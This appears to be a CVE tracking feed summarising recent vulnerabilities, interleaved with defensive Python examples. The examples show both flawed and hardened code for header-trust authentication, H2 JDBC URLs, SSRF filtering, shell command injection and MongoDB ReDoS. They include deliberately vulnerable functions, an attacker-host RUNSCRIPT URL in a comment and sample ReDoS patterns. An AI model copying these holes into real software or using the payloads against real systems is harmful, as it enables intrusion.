212 CVEs tracked today. 52 Critical, 56 High, 93 Medium, 3 Low.
-
CVE-2026-21891
CRITICAL
CVSS 9.4
ZimaOS (fork of CasaOS) through 1.5.0 has an authentication bypass where passwords for system service accounts are not properly validated during login. Attackers can access the system using known service account names with any password. PoC available, EPSS 13.6%.
Authentication Bypass
Zimaos
-
CVE-2026-22234
CRITICAL
CVSS 9.8
OPEXUS eCasePortal before 9.0.45.0 allows unauthenticated access to the Attachments.aspx endpoint with predictable formid values. Attackers can download, delete, or upload files without authentication.
Authentication Bypass
Ecase Portal
-
CVE-2026-22043
CRITICAL
CVSS 9.8
RustFS (alpha.13 to alpha.78) has a privilege escalation where restricted service accounts can self-issue unrestricted credentials by exploiting a flawed deny_only check in the IAM system. PoC available, patch available.
Privilege Escalation
Rustfs
-
CVE-2026-22034
CRITICAL
CVSS 9.8
Snuffleupagus PHP security module before 0.13.0 can be bypassed when upload validation uses VLD-based scripts and the VLD extension is not installed: the check is silently skipped (fails open) instead of refusing the upload, allowing malicious PHP file uploads. PoC available, patch available.
PHP
Snuffleupagus
-
CVE-2026-21881
CRITICAL
CVSS 9.1
Kanboard project management (through 1.2.48) has an authentication bypass when REVERSE_PROXY_AUTH is enabled. The application trusts HTTP headers for authentication without verifying the request came from the reverse proxy. Any attacker can impersonate any user including admins. PoC available, patch available.
Authentication Bypass
Kanboard
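The header-trust flaw described above, as an added example that is not Kanboard's own code: the vulnerable pattern believes any request that carries the identity header, while the hardened version honours that header only when the socket peer is the configured reverse proxy and the proxy proves itself with a shared secret. The header names, the proxy address and the secret are constructed for the example.

```python
import hmac
import ipaddress
from typing import Optional

# Constructed configuration for this example. In a real deployment the trusted
# network is the reverse proxy's own address, never a broad range.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.5/32")]
IDENTITY_HEADER = "X-Remote-User"        # hypothetical header name
PROXY_SECRET_HEADER = "X-Proxy-Secret"   # hypothetical header name
PROXY_SECRET = "constructed-shared-secret-for-the-example"


def vulnerable_user_from_request(remote_addr: str, headers: dict) -> Optional[str]:
    """The flawed pattern: whoever sets the identity header is believed,
    regardless of where the request came from."""
    return headers.get(IDENTITY_HEADER) or None


def hardened_user_from_request(remote_addr: str, headers: dict) -> Optional[str]:
    """Honour the identity header only when the TCP peer is a trusted proxy
    and the proxy presents the shared secret. remote_addr must be the socket
    peer address, not a value taken from X-Forwarded-For, which the attacker
    also controls."""
    try:
        peer = ipaddress.ip_address(remote_addr)
    except ValueError:
        return None
    if not any(peer in net for net in TRUSTED_PROXIES):
        return None
    presented = headers.get(PROXY_SECRET_HEADER, "")
    # Constant-time comparison so the secret cannot be guessed byte by byte.
    if not hmac.compare_digest(presented.encode(), PROXY_SECRET.encode()):
        return None
    user = headers.get(IDENTITY_HEADER, "").strip()
    return user or None
```

The same rule applies to whatever front door the application has: if the application is reachable on a port the proxy does not sit in front of, the check on the peer address is the only thing standing between the attacker and an arbitrary identity.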
-
CVE-2026-21877
CRITICAL
CVSS 9.9
n8n workflow automation (through 1.121.2) allows authenticated users to execute arbitrary code via the n8n service; the scope change means full compromise of both self-hosted and cloud instances. EPSS 12.5% indicates a high predicted probability of exploitation. Patch available.
RCE
Remote Code Execution
Code Injection
Node.js
N8n
-
CVE-2026-21876
CRITICAL
CVSS 9.3
OWASP Core Rule Set (CRS) before 4.22.0 and 3.3.8 has a bug in rule 922110 that allows WAF bypass on multipart requests. The rule's capture variables get overwritten when processing multiple parts, allowing SQL injection and other attacks to slip through. PoC available, patch available.
Information Disclosure
-
CVE-2026-21875
CRITICAL
CVSS 9.8
ClipBucket v5 (5.5.2-#187 and below) has blind SQL injection in the channel comment functionality via the obj_id parameter. Unauthenticated attackers can extract the entire database. PoC available.
PHP
SQLi
Clipbucket
-
CVE-2026-21858
CRITICAL
CVSS 10.0
n8n workflow automation (1.65.0 to 1.121.0) allows unauthenticated file access through form-based workflows: remote attackers can read sensitive files from the server, with potential for further compromise. PoC available.
Information Disclosure
Path Traversal
Lfi
Node.js
N8n
-
CVE-2025-69258
CRITICAL
CVSS 9.8
Trend Micro Apex Central has a DLL loading vulnerability (LoadLibraryEx) that allows unauthenticated remote attackers to load attacker-controlled DLLs and execute code as SYSTEM. PoC available.
Trendmicro
Apex Central
-
CVE-2025-68717
CRITICAL
CVSS 9.4
KAYSUS KS-WR3600 router (firmware 1.0.5.9.1) has session validation bypass – if any user is logged in, endpoints accept unauthenticated requests. Attackers piggyback on active sessions to execute privileged actions. PoC available.
Authentication Bypass
Ks Wr3600 Firmware
-
CVE-2025-68715
CRITICAL
CVSS 9.1
Panda Wireless PWRU0 devices (firmware 2.2.9) expose WAN, LAN, and wireless configuration endpoints without authentication. Remote attackers can modify all network settings. PoC available.
Denial Of Service
Privilege Escalation
Pwru01 Firmware
-
CVE-2025-67928
CRITICAL
CVSS 9.8
Automotive Listings WordPress theme (through 18.6) has blind SQL injection enabling unauthenticated database extraction.
SQLi
-
CVE-2025-67924
CRITICAL
CVSS 9.8
Corpkit WordPress theme (through 2.0) allows unauthenticated web shell upload via unrestricted file type upload.
File Upload
-
CVE-2025-67921
CRITICAL
CVSS 9.8
Lobo WordPress theme (before 2.8.6) has blind SQL injection enabling unauthenticated database extraction.
SQLi
-
CVE-2025-67920
CRITICAL
CVSS 9.8
Neo Ocular WordPress theme (before 1.2) allows PHP Local File Inclusion through improper filename control in include/require statements.
PHP
Lfi
-
CVE-2025-67915
CRITICAL
CVSS 9.8
Timetics WordPress plugin (through 1.0.46) allows authentication bypass via alternate path, enabling unauthenticated admin access to the booking system.
Industrial
Authentication Bypass
-
CVE-2025-67913
CRITICAL
CVSS 9.8
Aruba HiSpeed Cache WordPress plugin (before 3.0.3) has missing authorization allowing unauthenticated access to cache management functions with full CIA impact.
Authentication Bypass
-
CVE-2025-67911
CRITICAL
CVSS 9.8
Newsletters WordPress plugin by Tribulant (through 4.11) is vulnerable to PHP object injection through deserialization of untrusted data, potentially leading to RCE via POP chains.
Deserialization
-
CVE-2025-67910
CRITICAL
CVSS 9.8
Contentstudio WordPress plugin (through 1.3.7) allows unauthenticated web shell upload, enabling immediate server compromise.
File Upload
-
CVE-2025-67325
CRITICAL
CVSS 9.8
QloApps hotel management system (through 1.7.0) allows unauthenticated web shell upload through the hotel review feature. Attackers can achieve immediate remote code execution. PoC available.
RCE
Qloapps
-
CVE-2025-66916
CRITICAL
CVSS 9.4
RuoYi-Vue-Plus (through 5.5.1) allows arbitrary file read/write through QLExpress expression evaluation in the snailjob workflow node checker. Attackers can use the File class to access any file on the server. PoC available.
RCE
Code Injection
Ruoyi Vue Plus
-
CVE-2025-66913
CRITICAL
CVSS 9.8
JimuReport through 2.1.3 has RCE via user-controlled H2 JDBC URLs. The application passes attacker-supplied JDBC connection strings directly to the H2 driver, which supports directives for arbitrary Java code execution. PoC available.
Java
RCE
Jimureport
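The JimuReport entry above describes a class of bug, not a JimuReport-specific one: any application that forwards a user-supplied JDBC URL to the H2 driver hands the user H2's connection-time settings, of which INIT (which runs SQL such as RUNSCRIPT FROM a URL at connect time) is the well-known code-execution vector. The following is an added example, not JimuReport's or H2's code, of the validation a server should apply before it ever touches the driver. The allow-list of settings and the "in-memory databases only" rule are assumptions chosen for the example.

```python
import re

# Example allow-list of H2 settings a report builder might legitimately need
# (an assumption for this example; shrink it to what your feature actually uses).
ALLOWED_H2_SETTINGS = {"MODE", "DB_CLOSE_DELAY", "IFEXISTS"}
# INIT executes SQL on connect, e.g. RUNSCRIPT FROM 'http://attacker/x.sql'.
DANGEROUS_H2_SETTINGS = {"INIT"}
# Only named in-memory databases: no file paths, no tcp:// or ssl:// remote servers.
_MEM_LOCATION = re.compile(r"mem:[A-Za-z0-9_]+", re.IGNORECASE)


def validate_h2_url(url: str) -> dict:
    """Parse 'jdbc:h2:<location>;KEY=VALUE;...' and return the settings as a
    dict, or raise ValueError if the location or any setting is not allowed."""
    prefix = "jdbc:h2:"
    if not url.lower().startswith(prefix):
        raise ValueError("not an H2 JDBC URL")
    location, *settings = url[len(prefix):].split(";")
    if not _MEM_LOCATION.fullmatch(location.strip()):
        raise ValueError(f"disallowed database location: {location!r}")
    parsed = {}
    for setting in settings:
        if not setting.strip():
            continue
        key, sep, value = setting.partition("=")
        key = key.strip().upper()          # H2 treats setting names case-insensitively
        if not sep or key in DANGEROUS_H2_SETTINGS or key not in ALLOWED_H2_SETTINGS:
            raise ValueError(f"disallowed setting: {setting.strip()!r}")
        parsed[key] = value.strip()
    return parsed
```

The stronger design is to not accept JDBC URLs from users at all: an administrator registers data sources server-side and reports reference them by identifier. The validator above is the fallback for when the URL genuinely must come from the request.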
-
CVE-2025-62877
CRITICAL
CVSS 9.8
SUSE Harvester virtualization environment (1.5.x, 1.6.x) exposes the OS default SSH login password when using the interactive installer. This affects all hosts provisioned through the interactive method, potentially compromising entire virtualization clusters.
Ssh
Suse
-
CVE-2025-61548
CRITICAL
CVSS 9.8
Print Shop Pro WebDesk 18.34 has SQL injection in the hfInventoryDistFormID parameter of GetUnitPrice. Combined with CVE-2025-61546 (negative quantities), this endpoint has two critical vulnerabilities. PoC available, fixed in 19.69.
SQLi
Print Shop Pro Webdesk
-
CVE-2025-61546
CRITICAL
CVSS 9.1
Print Shop Pro WebDesk 18.34 allows purchasing items with negative quantities, creating financial discrepancies. Attackers can generate credits or manipulate pricing through the GetUnitPrice endpoint. PoC available, fixed in 19.69.
Code Injection
Print Shop Pro Webdesk
-
CVE-2025-61246
CRITICAL
CVSS 9.8
online-shopping-system-php 1.0 has SQL injection in review_action.php via the proId parameter. PoC available.
PHP
SQLi
Online Shopping System
-
CVE-2025-59470
CRITICAL
CVSS 9.0
Veeam allows Backup Operators to execute code as postgres via malicious interval or order parameters. Another operator-to-RCE escalation path with scope change.
PostgreSQL
RCE
-
CVE-2025-59469
CRITICAL
CVSS 9.0
Veeam allows Backup or Tape Operators to write files as root on the server. An operator-level role achieving root file write is a severe privilege escalation with scope change.
Information Disclosure
-
CVE-2025-59468
CRITICAL
CVSS 9.0
Veeam allows Backup Administrators to execute code as postgres via a malicious password parameter. Scope change means OS-level compromise from application-level admin access.
PostgreSQL
RCE
-
CVE-2025-56425
CRITICAL
CVSS 9.1
enaio document management AppConnector (multiple versions) has SMTP command injection via the /osrest/api/organization/s endpoint. Authenticated attackers can inject arbitrary SMTP commands, potentially sending spam or phishing emails through the organization's mail server. PoC available.
Command Injection
Enaio
-
CVE-2025-23993
CRITICAL
CVSS 9.8
Felan Framework (through 1.1.3) also has SQL injection in addition to the auth bypass (CVE-2025-23504). The two critical vulnerabilities in the same plugin can be chained.
SQLi
-
CVE-2025-23504
CRITICAL
CVSS 9.8
Felan Framework for WordPress (through 1.1.3) allows authentication bypass through an alternate path, enabling unauthenticated admin access.
Authentication Bypass
-
CVE-2025-22728
CRITICAL
CVSS 9.8
Workreap WordPress plugin (through 3.3.6) has SQL injection enabling unauthenticated database extraction. A freelance marketplace plugin likely containing user PII and financial data.
SQLi
-
CVE-2025-22726
CRITICAL
CVSS 9.1
nK Themes Helper WordPress plugin (through 1.7.9) has SSRF enabling unauthenticated server-side requests to internal services and cloud metadata endpoints.
SSRF
-
CVE-2025-22713
CRITICAL
CVSS 9.8
WooCommerce Orders & Customers Exporter (through 5.4) has SQL injection enabling unauthenticated extraction of all order and customer data including payment details and personal information.
WordPress
SQLi
PHP
-
CVE-2025-22712
CRITICAL
CVSS 9.8
Typify WordPress theme (through 3.0.2) allows PHP Local File Inclusion via improper filename control.
PHP
Lfi
-
CVE-2025-22708
CRITICAL
CVSS 9.8
Mitech WordPress theme (through 2.3.4) allows PHP Local File Inclusion through improper filename control in include/require statements.
PHP
Lfi
Mitech
-
CVE-2025-22707
CRITICAL
CVSS 9.8
Moody WordPress theme (through 2.7.3) allows PHP Local File Inclusion through improper filename control.
PHP
Lfi
Moody
-
CVE-2025-22509
CRITICAL
CVSS 9.8
Atlas WordPress theme (through 2.1.0) allows PHP Local File Inclusion through improper filename control in PHP include statements.
PHP
Lfi
-
CVE-2025-14431
CRITICAL
CVSS 9.8
Navian WordPress theme (through 1.5.4) allows PHP Local File Inclusion through improper filename control.
PHP
Lfi
-
CVE-2025-14430
CRITICAL
CVSS 9.8
Brook WordPress theme (through 2.8.9) allows PHP Local File Inclusion via improper filename control in PHP include statements.
PHP
Lfi
Information Disclosure
-
CVE-2025-14429
CRITICAL
CVSS 9.8
AeroLand WordPress theme (through 1.6.6) allows PHP Local File Inclusion through improper filename control. Unauthenticated RCE possible via include chain.
PHP
Lfi
Aeroland
-
CVE-2025-14360
CRITICAL
CVSS 9.8
Blockons WordPress plugin (through 1.2.15) has missing authorization allowing unauthenticated access to restricted functionality with full CIA impact.
Authentication Bypass
-
CVE-2025-14359
CRITICAL
CVSS 9.8
Oshine WordPress theme (through 7.2.7) allows PHP Local File Inclusion via improper filename control in include/require statements.
PHP
Lfi
-
CVE-2025-14358
CRITICAL
CVSS 9.8
REHub Framework for WordPress (through 19.9.5) has missing authorization allowing unauthenticated access to restricted functionality with full CIA impact.
Authentication Bypass
-
CVE-2025-12550
CRITICAL
CVSS 9.8
OchaHouse WordPress theme (through 2.2.8) allows PHP Local File Inclusion via improper filename control. Same vulnerability class as CVE-2025-12549.
PHP
Lfi
-
CVE-2025-12549
CRITICAL
CVSS 9.8
Rozy Flower Shop WordPress theme (through 1.2.25) allows PHP Local File Inclusion through improper filename control in include/require statements. Unauthenticated RCE possible.
PHP
Lfi
-
CVE-2019-25296
CRITICAL
CVSS 9.8
The WP Cost Estimation plugin for WordPress is vulnerable to arbitrary file uploads and deletion due to missing file type validation in the lfb_upload_form and lfb_removeFile AJAX actions in versions up to, and including, 9.642. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected sites server which may make remote code execution possible. Additionally, the attacker can also delete files on the server such as database configuration files, subsequently...
WordPress
RCE
-
CVE-2019-25282
CRITICAL
CVSS 9.8
V-SOL GPON/EPON OLT Platform v2.03 contains an open redirect vulnerability in the script that allows attackers to manipulate the 'parent' GET parameter. [CVSS 9.8 CRITICAL]
Open Redirect
-
CVE-2019-25268
CRITICAL
CVSS 9.8
NREL BEopt 2.8.0.0 contains a DLL hijacking vulnerability that allows attackers to load arbitrary libraries by tricking users into opening application files from remote shares. [CVSS 9.8 CRITICAL]
Privilege Escalation
-
CVE-2017-20216
CRITICAL
CVSS 9.8
FLIR Thermal Camera PT-Series firmware version 8.0.0.64 contains multiple unauthenticated remote command injection vulnerabilities in the controllerFlirSystem.php script. [CVSS 9.8 CRITICAL]
PHP
Command Injection
-
CVE-2026-22521
HIGH
CVSS 7.5
PHP Local File Inclusion in G5Theme Handmade Framework versions up to 3.9 enables authenticated attackers to read arbitrary files on the server through improper validation of include/require statements. An attacker with valid credentials can exploit this vulnerability to access sensitive configuration files, source code, or other protected data without requiring user interaction. No patch is currently available for this vulnerability.
PHP
Lfi
-
CVE-2026-22257
HIGH
CVSS 8.8
Salvo is a Rust web backend framework. [CVSS 8.8 HIGH]
XSS
Salvo
-
CVE-2026-22256
HIGH
CVSS 8.8
Salvo is a Rust web backend framework. [CVSS 8.8 HIGH]
XSS
Salvo
-
CVE-2026-22255
HIGH
CVSS 8.8
Heap buffer overflow in iccDEV versions before 2.3.1.2 allows remote code execution when processing malicious ICC color profiles, affecting applications that use the iccDEV library to handle color management data. Public exploit code exists for this vulnerability. The only user interaction required is opening the crafted profile, which triggers memory corruption leading to arbitrary code execution.
Memory Corruption
Iccdev
-
CVE-2026-22245
HIGH
CVSS 7.5
Mastodon has a Server-Side Request Forgery (SSRF, CWE-918) caused by incomplete private address range validation in its IP address filtering: an unauthenticated remote attacker can craft requests that use unblocked IP ranges to reach local and loopback services, potentially exposing private resources and internal APIs. Patched versions 4.5.4, 4.4.11, 4.3.17, and 4.2.29 are available.
SSRF
Mastodon
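The "incomplete private address range validation" in the Mastodon entry above is the usual SSRF failure: a block-list of a few RFC 1918 ranges that misses loopback, link-local (where cloud metadata services live), the CGNAT range, IPv4-mapped IPv6 addresses, and the numeric shorthands the libc resolver accepts but strict parsers do not. The following added example, which is not Mastodon's code, checks every resolved address against the full set of non-public ranges and also goes beyond the entry by rejecting ambiguous numeric hosts. The resolver hook exists so the function can be exercised offline.

```python
import ipaddress
import re
import socket

# inet_aton-style shorthand (octal, hex, packed decimal, fewer than four parts)
# that strict parsers reject but the system resolver would happily accept.
_SHORTHAND_IPV4 = re.compile(
    r"(0x[0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)(\.(0x[0-9a-fA-F]+|0[0-7]*|[1-9][0-9]*)){0,3}"
)
CGNAT = ipaddress.ip_network("100.64.0.0/10")   # shared address space, neither private nor global


def is_disallowed_address(addr) -> bool:
    """True for any address that must never be a fetch target."""
    # Unwrap IPv4-mapped IPv6 (::ffff:169.254.169.254) so the IPv4 rules apply to it.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return (addr.is_private or addr.is_loopback or addr.is_link_local
            or addr.is_multicast or addr.is_reserved or addr.is_unspecified
            or addr in CGNAT)


def resolve_and_check(host: str, resolver=None) -> list:
    """Resolve host and return its addresses as strings if every one of them is
    allowed; raise ValueError otherwise. resolver(host) -> iterable of address
    strings; the default uses the system resolver. Connect to the returned
    addresses rather than resolving again, or a rebinding DNS name defeats
    the check."""
    host = host.strip().strip("[]")
    try:
        addrs = [ipaddress.ip_address(host)]
    except ValueError:
        if _SHORTHAND_IPV4.fullmatch(host):
            raise ValueError(f"ambiguous numeric host rejected: {host!r}")
        if resolver is None:
            resolver = lambda h: {ai[4][0] for ai in socket.getaddrinfo(h, None)}
        addrs = [ipaddress.ip_address(a) for a in resolver(host)]
    if not addrs:
        raise ValueError(f"{host!r} resolved to nothing")
    blocked = [str(a) for a in addrs if is_disallowed_address(a)]
    if blocked:
        raise ValueError(f"{host!r} resolves to disallowed address(es): {blocked}")
    return [str(a) for a in addrs]
```

Two things the check alone does not cover: redirects (the target of each 3xx must go through the same function) and DNS rebinding, which is why the caller should pin the connection to the addresses returned here instead of letting the HTTP client resolve the name a second time.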
-
CVE-2026-22244
HIGH
CVSS 7.2
Remote code execution in OpenMetadata versions before 1.11.4 through Server-Side Template Injection in FreeMarker email templates allows authenticated administrators to execute arbitrary code on the affected system. Public exploit code exists for this vulnerability, and attackers with admin-level access can leverage unsafe template processing to compromise the metadata platform. A patch is available in version 1.11.4 and should be applied immediately.
RCE
Openmetadata
-
CVE-2026-22241
HIGH
CVSS 7.2
Openeclass versions up to 4.2 are affected by unrestricted upload of a file with dangerous type (CVSS 7.2).
RCE
Openeclass
-
CVE-2026-22235
HIGH
CVSS 7.5
Ecase Ecomplaint versions up to 9.0.45.0 are affected by authorization bypass through a user-controlled key (CVSS 7.5).
Authentication Bypass
Ecase Ecomplaint
-
CVE-2026-22230
HIGH
CVSS 7.6
OPEXUS eCASE Audit contains an access control bypass that allows authenticated users to circumvent administrative restrictions by manipulating client-side JavaScript or crafting direct HTTP requests to re-enable disabled functions and buttons. This vulnerability affects eCASE Platform versions prior to 11.14.1.0 and could enable attackers to perform unauthorized actions that administrators have explicitly blocked; disabling a button in the UI is not an authorization check, so the server must enforce the restriction itself.
Authentication Bypass
Ecase Audit
-
CVE-2026-22042
HIGH
CVSS 8.8
Incorrect IAM permission validation in RustFS prior to version 1.0.0-alpha.79 permits principals with export-only permissions to execute import operations, enabling unauthorized modification of users, groups, policies, and service accounts. Public exploit code exists for this vulnerability, and authenticated attackers can escalate privileges through malicious IAM imports. All versions before 1.0.0-alpha.79 are affected.
Privilege Escalation
Rustfs
-
CVE-2026-22035
HIGH
CVSS 7.7
Arbitrary command execution in Greenshot 1.3.310 and earlier stems from insufficient input validation in filename processing, where unsanitized user-supplied filenames are passed directly to shell commands. An attacker can exploit this through a malicious filename containing shell metacharacters to achieve local code execution with user privileges. Public exploit code exists for this vulnerability; users should upgrade to version 1.3.311 or later.
Windows
Command Injection
Greenshot
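The Greenshot entry above is the classic filename-to-shell bug. The following added example (not Greenshot's code, which is C#) shows the three patterns side by side using a Python one-liner and the shell's echo as stand-ins for the external tool: interpolating the name into a shell command string, passing it as a single argv element with no shell, and, when a shell is unavoidable, quoting it. The shell portions assume a POSIX shell.

```python
import json
import shlex
import subprocess
import sys

# Stand-in for the external tool: a Python one-liner that reports its argv.
ARGV_ECHO = "import sys, json; print(json.dumps(sys.argv[1:]))"


def launch_vulnerable(filename: str) -> str:
    """Flawed pattern: the filename is pasted into a command string and handed
    to a shell, so '&&', ';', '$(...)' and friends in the name are parsed as
    shell syntax. 'echo' stands in for the external tool; returns the shell's
    stdout so the effect is visible."""
    completed = subprocess.run(f"echo {filename}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout


def launch_safe(filename: str) -> list:
    """Hardened: the filename is one argv element and no shell is involved, so
    metacharacters are just bytes of the name. Returns the argv the tool saw."""
    completed = subprocess.run([sys.executable, "-c", ARGV_ECHO, filename],
                               capture_output=True, text=True, check=True)
    return json.loads(completed.stdout)


def launch_quoted(filename: str) -> str:
    """If a shell really is unavoidable (a user-configurable command template,
    say), quote every interpolated value with shlex.quote."""
    completed = subprocess.run(f"echo {shlex.quote(filename)}", shell=True,
                               capture_output=True, text=True)
    return completed.stdout
```

On Windows the quoting rules of cmd.exe differ from shlex's POSIX rules, which is one more reason the argv-list form is the fix to reach for: it works the same way on both platforms and leaves nothing for a shell to interpret.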
-
CVE-2026-21873
HIGH
CVSS 7.2
NiceGUI versions 2.22.0 through 3.4.1 contain a DOM-based cross-site scripting vulnerability in the pushstate event listener for ui.sub_pages that allows attackers to manipulate URL fragment identifiers via iframe injection. Public exploit code exists for this vulnerability; affected users should upgrade to version 3.5.0 or later.
Python
Nicegui
-
CVE-2026-21869
HIGH
CVSS 8.8
Llama.cpp server endpoints fail to validate the n_discard parameter from JSON input, allowing negative values that trigger out-of-bounds memory writes when the context buffer fills. This memory corruption vulnerability affects LLM inference operations and can be exploited remotely without authentication to crash the service or achieve code execution; public exploit code exists and no patch is currently available.
RCE
Memory Corruption
Denial Of Service
AI / ML
Llama.Cpp
-
CVE-2026-21868
HIGH
CVSS 7.5
Flagforge versions 2.3.2 and earlier suffer from a Regular Expression Denial of Service (ReDoS) vulnerability in the user profile API endpoint that accepts unvalidated usernames containing regex metacharacters, allowing unauthenticated remote attackers to trigger excessive CPU consumption and deny service to legitimate users. The MongoDB regex engine processes these malicious patterns inefficiently, making the platform unavailable without administrator intervention. No patch is currently available; users should implement WAF rules to filter regex metacharacters from username inputs as a temporary mitigation.
MongoDB
Denial Of Service
Flagforge
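The Flagforge entry above is the common shape of a MongoDB ReDoS: a username from the request is dropped straight into a `$regex` operator, so an attacker submits a pattern with nested quantifiers instead of a name. The following added example (not Flagforge's code) contrasts the flawed query builder with two hardened ones; the username alphabet and the `username_lower` field are assumptions made for the example.

```python
import re

# Constructed policy for the example: what a username may look like.
USERNAME_RE = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def vulnerable_lookup_query(username: str) -> dict:
    """Flawed pattern: the raw username becomes the regex, so '(a+)+$' or
    '(.*a){20}' is handed to the server's backtracking engine as-is."""
    return {"username": {"$regex": username, "$options": "i"}}


def hardened_lookup_query(username: str) -> dict:
    """Reject anything outside the username alphabet, then escape and anchor,
    so the pattern can only ever be a literal match with linear cost."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allowed set")
    return {"username": {"$regex": f"^{re.escape(username)}$", "$options": "i"}}


def exact_lookup_query(username: str) -> dict:
    """Preferred: no regex at all. Store a case-folded copy of the username in
    an indexed field (username_lower here, an assumption for the example) and
    match it exactly; this is also the only form that can use an index."""
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username contains characters outside the allowed set")
    return {"username_lower": username.casefold()}
```

The WAF rule the entry suggests as a stop-gap is exactly the first check in the hardened functions, moved to the edge; it buys time but does not replace the fix in the query builder, which is the only place that can guarantee every code path is covered.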
-
CVE-2026-21638
HIGH
CVSS 8.8
Remote code execution in Ubiquiti airMAX wireless devices (UBB, UBB-XG, UDB-Pro/UDB-Pro-Sector) allows adjacent-network attackers to execute arbitrary code without authentication by exploiting a protocol vulnerability. Affected versions: UBB-XG 1.2.2 and earlier, UDB-Pro/UDB-Pro-Sector 1.4.1 and earlier, and UBB 3.1.5 and earlier. The vendor has released mitigation firmware versions.
RCE
Udb Pro Sector Firmware
Udb Pro Firmware
Ubb Xg Firmware
Ubb Firmware
-
CVE-2026-21427
HIGH
CVSS 7.8
Arbitrary code execution in PIONEER CORPORATION product installers through DLL search path manipulation allows local attackers with user interaction to execute malicious code with installer privileges. The vulnerability affects multiple products and requires user interaction to trigger, potentially compromising system integrity during software installation. No patch is currently available.
Privilege Escalation
RCE
-
CVE-2026-0719
HIGH
CVSS 8.6
Libsoup's NTLM authentication handler crashes when processing exceptionally long passwords due to a signed integer overflow in memory allocation calculations, affecting GNOME and applications relying on this library for network operations. An unauthenticated remote attacker can trigger a denial-of-service condition by sending specially crafted authentication requests. No patch is currently available.
Denial Of Service
Redhat
Suse
-
CVE-2026-0700
HIGH
CVSS 7.3
Intern Membership Management System versions up to 1.0 are affected by SQL injection (CVSS 7.3).
PHP
SQLi
Intern Membership Management System
-
CVE-2025-69260
HIGH
CVSS 7.5
A message out-of-bounds read vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability. [CVSS 7.5 HIGH]
Trendmicro
Apex Central
-
CVE-2025-69259
HIGH
CVSS 7.5
A message unchecked NULL return value vulnerability in Trend Micro Apex Central could allow a remote attacker to create a denial-of-service condition on affected installations. Please note: authentication is not required in order to exploit this vulnerability. [CVSS 7.5 HIGH]
Trendmicro
Apex Central
-
CVE-2025-68891
HIGH
CVSS 7.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ryan Sutana WP App Bar wp-app-bar allows Reflected XSS. This issue affects WP App Bar: from n/a through <= 1.5. [CVSS 7.1 HIGH]
WordPress
XSS
PHP
-
CVE-2025-68889
HIGH
CVSS 7.1
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pinpoll Pinpoll pinpoll allows Reflected XSS. This issue affects Pinpoll: from n/a through <= 4.0.0. [CVSS 7.1 HIGH]
XSS
-
CVE-2025-68887
HIGH
CVSS 7.1
CMSJunkie - WordPress Business Directory Plugins WP-BusinessDirectory wp-businessdirectory is affected by cross-site scripting (XSS) (CVSS 7.1).
WordPress
XSS
-
CVE-2025-68874
HIGH
CVSS 7.1
Shahjada Visitor Stats Widget visitor-stats-widget is affected by cross-site scripting (XSS) (CVSS 7.1).
XSS
-
CVE-2025-68873
HIGH
CVSS 7.1
chloédigital PRIMER by chloédigital primer-by-chloedigital is affected by cross-site scripting (XSS) (CVSS 7.1).
XSS
-
CVE-2025-68719
HIGH
CVSS 8.8
KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 mishandle configuration management. Once any user is logged in and maintains an active session, an attacker can directly query the backup endpoint and download a full configuration archive. [CVSS 8.8 HIGH]
Information Disclosure
Ks Wr3600 Firmware
-
CVE-2025-68716
HIGH
CVSS 8.4
KAYSUS KS-WR3600 routers with firmware 1.0.5.9.1 ship with the SSH service enabled by default on the LAN interface. The root account is configured with no password, and administrators cannot disable SSH or enforce authentication via the CLI or web GUI. [CVSS 8.4 HIGH]
Ssh
Ks Wr3600 Firmware
-
CVE-2025-68151
HIGH
CVSS 7.5
CoreDNS is a DNS server that chains plugins. Prior to version 1.14.0, multiple CoreDNS server implementations (gRPC, HTTPS, and HTTP/3) lack critical resource-limiting controls. An unauthenticated remote attacker can exhaust memory and degrade or crash the server by opening many concurrent connections, streams, or sending oversized request bodies. The issue is similar in nature to CVE-2025-47950 (QUIC DoS) but affects additional server types that do not enforce connection limits, stream limit...
Dns
Denial Of Service
Coredns
Redhat
Suse
-
CVE-2025-67937
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Hendon hendon allows PHP Local File Inclusion. This issue affects Hendon: from n/a through < 1.7. [CVSS 8.1 HIGH]
PHP
Lfi
Hendon
-
CVE-2025-67936
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Curly curly allows PHP Local File Inclusion. This issue affects Curly: from n/a through < 3.3. [CVSS 8.1 HIGH]
PHP
Lfi
Curly
-
CVE-2025-67935
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Optimize optimizewp allows PHP Local File Inclusion. This issue affects Optimize: from n/a through < 2.4. [CVSS 8.1 HIGH]
PHP
Lfi
Optimize
-
CVE-2025-67934
HIGH
CVSS 8.1
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Wellspring wellspring allows PHP Local File Inclusion. This issue affects Wellspring: from n/a through < 2.8. [CVSS 8.1 HIGH]
PHP
Lfi
Wellspring
-
CVE-2025-67931
HIGH
CVSS 7.5
Insertion of Sensitive Information Into Sent Data vulnerability in AITpro BulletProof Security bulletproof-security allows Retrieve Embedded Sensitive Data. This issue affects BulletProof Security: from n/a through <= 6.9. [CVSS 7.5 HIGH]
Information Disclosure
-
CVE-2025-67926
HIGH
CVSS 8.8
Missing Authorization vulnerability in Shahjahan Jewel Fluent Support fluent-support allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Fluent Support: from n/a through <= 1.10.4. [CVSS 8.8 HIGH]
Authentication Bypass
-
CVE-2025-67925
HIGH
CVSS 8.1
